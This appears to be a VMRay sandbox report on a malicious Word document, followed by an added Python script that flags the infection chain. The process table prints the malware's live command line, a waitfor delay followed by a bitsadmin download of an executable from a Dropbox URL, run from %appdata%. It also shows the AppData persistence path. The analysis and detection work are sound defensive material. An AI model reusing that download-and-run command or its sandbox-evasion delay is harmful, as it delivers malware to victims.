Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | VMRay Analyzer Report
Analysis Information
Creation Time 2018-01-10 19:51 (UTC+1)
VM Analysis Duration Time 00:10:14
Execution Successful True
Sample Filename receipt-parcel-UK980-456.doc
Command Line Parameters False
Prescript False
Number of Processes 17
Termination Reason Timeout
Reputation Enabled True
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 94
VTI Rule Type Documents
Tags
#evasion #malware
Remarks
Critical The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Critical The dump total size limit was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Critical The operating system was rebooted during the analysis.
Monitored Processes
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID
#1 | 0x954 | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" | -
#2 | 0xa50 | Child Process | Medium | cmd.exe | cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe" | #1
#3 | 0xa6c | Child Process | Medium | waitfor.exe | waitfor /t 5 YKERQ | #2
#4 | 0xa90 | Child Process | Medium | bitsadmin.exe | bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe | #2
#6 | 0x65c | Child Process | Medium | iuoldw.exe | C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe | #2
#7 | 0x7a8 | Child Process | Medium | roottools.exe | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" | #6
#8 | 0x7f0 | Child Process | Medium | cmd.exe | "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat" | #6
#12 | 0x634 | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #7
#13 | 0x5fc | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #7
#15 | 0x6a4 | Autostart | Medium | roottools.exe | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" | -
#16 | 0x320 | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #15
#17 | 0x7f8 | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #15
#20 | 0x594 | Child Process | Medium | upde25b4796.exe | "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe" | #16
#22 | 0x7e8 | Child Process | Medium | roottools.exe | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" | #20
#23 | 0x6a4 | Child Process | Medium | cmd.exe | "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat" | #20
#24 | 0x638 | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #22
#25 | 0x7e0 | Child Process | Medium | svchost.exe | C:\Windows\SysWOW64\svchost.exe -k netsvcs | #22
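The process list above is the whole delivery chain: the Word macro drives cmd.exe, cmd.exe sleeps five seconds with waitfor (a cheap way to outlast short sandbox runs), pulls the payload with bitsadmin into %appdata%, and starts it; the payload drops roottools.exe under a Flash Player look-alike path in AppData, that binary is later launched by Autostart, and every roottools.exe instance spawns 32-bit svchost.exe children that services.exe never started. The following is an added example written for this page, not VMRay's code or output: detection logic in Python that walks a process list shaped like the table and flags each of those behaviours. The process entries are constructed from the table above (image names, command lines and parent IDs as listed); the rule names and the lists of Office, shell, downloader and delay binaries are this example's own choices.

```python
"""Flag the behaviours visible in the Monitored Processes table (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Proc:
    image: str             # Image Name column
    cmdline: str           # Command Line column
    parent: Optional[str]  # Origin ID column (table ID of the parent), None for a root
    reason: str            # Monitor Reason column


# Constructed from the report's table; APP/ROOTTOOLS only shorten the repeated paths.
APP = r"C:\Users\aETAdzjz\AppData"
ROOTTOOLS = APP + r"\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe -k netsvcs"
DROP_URL = "https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1"
PROCS: Dict[str, Proc] = {
    "#1": Proc("winword.exe", r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"', None, "Analysis Target"),
    "#2": Proc("cmd.exe", 'cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal '
               + DROP_URL + ' %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe"', "#1", "Child Process"),
    "#3": Proc("waitfor.exe", "waitfor /t 5 YKERQ", "#2", "Child Process"),
    "#4": Proc("bitsadmin.exe", "bitsadmin /transfer UKEF /download /priority normal " + DROP_URL
               + " " + APP + r"\Roaming\iuoldw.exe", "#2", "Child Process"),
    "#6": Proc("iuoldw.exe", APP + r"\Roaming\iuoldw.exe", "#2", "Child Process"),
    "#7": Proc("roottools.exe", '"' + ROOTTOOLS + '"', "#6", "Child Process"),
    "#8": Proc("cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "' + APP + r'\Local\Temp\updaa5900b0.bat"', "#6", "Child Process"),
    "#12": Proc("svchost.exe", SVCHOST, "#7", "Child Process"),
    "#13": Proc("svchost.exe", SVCHOST, "#7", "Child Process"),
    "#15": Proc("roottools.exe", '"' + ROOTTOOLS + '"', None, "Autostart"),
    "#16": Proc("svchost.exe", SVCHOST, "#15", "Child Process"),
    "#17": Proc("svchost.exe", SVCHOST, "#15", "Child Process"),
    "#20": Proc("upde25b4796.exe", '"' + APP + r'\Local\Temp\upde25b4796.exe"', "#16", "Child Process"),
    "#22": Proc("roottools.exe", '"' + ROOTTOOLS + '"', "#20", "Child Process"),
    "#23": Proc("cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "' + APP + r'\Local\Temp\upd9dba1b78.bat"', "#20", "Child Process"),
    "#24": Proc("svchost.exe", SVCHOST, "#22", "Child Process"),
    "#25": Proc("svchost.exe", SVCHOST, "#22", "Child Process"),
}

# Rule vocabulary (example's own lists, extend to taste).
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"bitsadmin.exe", "certutil.exe", "powershell.exe", "curl.exe"}
DELAYERS = {"waitfor.exe", "timeout.exe", "ping.exe", "sleep.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)
USER_DIR_RE = re.compile(r"\\AppData\\|\\Temp\\|%appdata%", re.I)


def image_path(cmdline: str) -> str:
    """First token of a command line, honouring a quoted image path."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def ancestors(procs: Dict[str, Proc], pid: str) -> List[str]:
    """Table IDs of all ancestors, nearest first; stops at a root or an unlisted parent."""
    chain, cur = [], procs[pid].parent
    while cur in procs:
        chain.append(cur)
        cur = procs[cur].parent
    return chain


def analyze(procs: Dict[str, Proc]) -> Dict[str, List[str]]:
    """Return {table ID: [rule names]} for every process that trips at least one rule."""
    hits: Dict[str, List[str]] = {}
    for pid, p in procs.items():
        img = p.image.lower()
        lineage = {procs[a].image.lower() for a in ancestors(procs, pid)}
        parent_img = procs[p.parent].image.lower() if p.parent in procs else None
        rules: List[str] = []
        if img in SHELLS and lineage & OFFICE:            # macro -> shell
            rules.append("office_spawned_shell")
        if img in SHELLS and USER_DIR_RE.search(p.cmdline):  # shell runs a script/exe from a user dir
            rules.append("shell_runs_user_writable_script")
        if img in DELAYERS and lineage & OFFICE:          # sleep before the payload (sandbox timeout evasion)
            rules.append("delay_before_payload")
        if img in DOWNLOADERS and URL_RE.search(p.cmdline):  # LOLBin fetch of a remote binary
            rules.append("lolbin_download")
        if USER_DIR_RE.search(image_path(p.cmdline)):     # binary executed from AppData/Temp
            rules.append("exec_from_user_writable_dir")
            if p.reason.lower() == "autostart":           # ...and it comes back after reboot
                rules.append("persistence_autostart")
        if img == "svchost.exe" and parent_img != "services.exe":  # svchost not started by the SCM
            rules.append("svchost_unexpected_parent")
        if rules:
            hits[pid] = rules
    return hits


if __name__ == "__main__":
    for pid, rules in analyze(PROCS).items():
        print(pid, PROCS[pid].image, ", ".join(rules))
```

Only the WINWORD.EXE root escapes every rule; the six svchost.exe instances are all caught by the parent check alone, which is the cheapest high-confidence signal in this tree because a legitimate netsvcs host is started by services.exe, not by a binary living under a user's Flash Player profile directory.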
Sample Information
ID #20911
MD5 Hash Value 1dfa6c28e296b4196f92c8b97e050754
SHA1 Hash Value b8c701c3a0059820ee60111aa3cc6add2dbc33d0
SHA256 Hash Value 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772
Filename receipt-parcel-UK980-456.doc
File Size 109.00 KB (111616 bytes)
File Type Word Document
Has VBA Macros True
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-12-15 17:49
Microsoft Office Version 2016
Microsoft Word Version 16.0.4266.1003
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.115
Firefox Version 25.0
Flash Version 11.2.202.233
Java Version 7.0.710
VM Name win7_64_sp1-mso2016
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)